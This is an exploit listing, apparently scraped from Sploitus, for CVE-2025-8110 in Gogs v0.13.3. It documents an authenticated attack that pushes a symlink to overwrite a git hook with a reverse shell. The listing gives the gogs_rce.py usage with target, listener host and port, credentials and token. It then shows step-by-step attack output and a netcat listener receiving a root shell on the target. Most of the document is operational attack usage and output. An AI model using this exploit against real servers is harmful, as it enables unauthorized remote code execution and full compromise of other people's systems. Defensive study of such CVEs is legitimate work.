Exploit for Path Traversal in Gogs CVE-2025-8110

Name: Exploit for Path Traversal in Gogs CVE-2025-8110
Rating: 5 (122 reviews)
2026-04-12 | CVSS 8.8
## https://sploitus.com/exploit?id=FF789810-0F60-530D-A6DB-50BED1D86B55
# CVE-2025-8110-Authenticated-Remote-Code-Execution-on-Gogs-v0.13.3
A remote code execution to get a reverse shell on Gogs (v0.13.3)

This needs an authenticated credentials and api-token to work.

# Usage:

```bash
kali@kali: python3 gogs_rce.py
usage: gogs_rce.py [-h] -t TARGET -l LHOST -lp LPORT -e EMAIL -p PASSWORD -a TOKEN
gogs_rce.py: error: the following arguments are required: -t/--target, -l/--lhost, -lp/--lport, -e/--email, -p/--password, -a/--token
```

```bash
kali@kali: python3 gogs_rce.py -t http://target -l Listener_ip -lp 4444 -e hello@test.com -p hello123 -a token_here
[*] Target: http://target
[*] Identifying internal username from email...
[+] Authenticated as: hello (hello@test.com)
[*] Creating repository: pwn_rev_1775970279
[*] Initializing local repo and pushing symlink...
[master (root-commit) 49428b8] link creation
 1 file changed, 1 insertion(+)
 create mode 120000 evil.link
[*] Fetching SHA and overwriting hook with reverse shell...
[*] TRIGGERING: Check your listener on 4444...
[master d027fb0] trigger rce
 1 file changed, 1 insertion(+)
 create mode 100644 trigger.txt
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 4 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 272 bytes | 272.00 KiB/s, done.
Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
[+] Push timed out (this is normal when reverse shell is active).

[+] Done.
```

This will provide the reverse shell for the user who is running the process.

```
kali@kali: nc -nlvp 4444
listening on [any] 4444 ...
connect to [ListenIP] from (UNKNOWN) [TargetIp] 39180
root@TargetIp:~/gogs-repositories/hello/pwn_rev_1775971368.git# id
id
uid=0(root) gid=0(root) groups=0(root)
```